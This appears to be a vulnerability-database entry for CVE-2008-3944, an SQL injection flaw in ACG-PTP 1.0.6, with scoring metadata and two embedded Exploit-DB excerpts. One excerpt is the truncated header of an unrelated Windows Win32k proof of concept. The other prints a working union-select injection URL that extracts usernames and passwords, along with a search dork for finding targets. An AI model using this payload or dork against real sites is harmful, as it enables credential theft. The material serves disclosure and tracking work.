CVE-2008-3944
Published 2008-09-05
CVE-2008-3944: SQL injection vulnerability in index.php in ACG-PTP 1.0.6 allows remote attackers to execute arbitrary SQL commands via the adid parameter in an adorder action.
Priority P3 · 40 · high · 7.5 CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 0.97% (57.3th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| discountedscripts | acg_ptp | — | — |
No detection rules found.
Exploit-DB
Microsoft Windows - Win32k Pointer Dereferencement (PoC) (MS10-098)
exploitdb·2010-12-17·CVSS 7.2
CVE-2010-3944 [HIGH] Microsoft Windows - Win32k Pointer Dereferencement (PoC) (MS10-098)
---
/*************************************************************************************
* MS10-098
* CVE-2010-3944
*
* Microsoft Windows Win32k pointer dereferencement
*
* --------------------
* Affected Software
* ------------------------
* Microsoft Windows 7 / 2008
*
*
* --------------------
* Consequences
* -----------------------
* An unprivileged user may be able to cause a bugcheck, or possibly execute
* arbitrary code by CSRSS.EXE.
*
*
*
* Credits : Stefan LE BERRE ([email protected])
* Ludo t0ka7a
*
* WebSites : http://www.sysdream.com/
* http://ghostsinthestack.org/
* http://infond.blogspot.com/
* http://twitter.com/hackinparis
*
* kd> r
* eax=00013370 ebx=0000000d ecx=00000000 edx=fea0069c esi=fea00618
Exploit-DB
ACG-PTP 1.0.6 - 'adid' SQL Injection
exploitdb·2008-09-04
CVE-2008-3944 ACG-PTP 1.0.6 - 'adid' SQL Injection
---
|___________________________________________________|
|
| ACG-PTP 1.0.6 (adid) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
| Author: Hussin X
|
| Home : WwW.Hussin-X.CoM | www.tryag.cc/cc
|
| email: darkangel_g85[at]Yahoo[DoT]com
|
|
|___________________________________________________
| |
|
| script :http://discountedscripts.com/product_info.php?products_id=65
|
| DorK : inurl:index.php?menu=adorder
|___________________________________________________|
Exploit:
www.[target].com/Script/index.php?menu=adorder&adid=-3+union+select+null,null,concat_ws(0x3a,username,password),null+From+users--
L!VE DEMO:
http://www.discountedscripts.com/demos/a
No writeups or analysis indexed.
2008-09-05
Published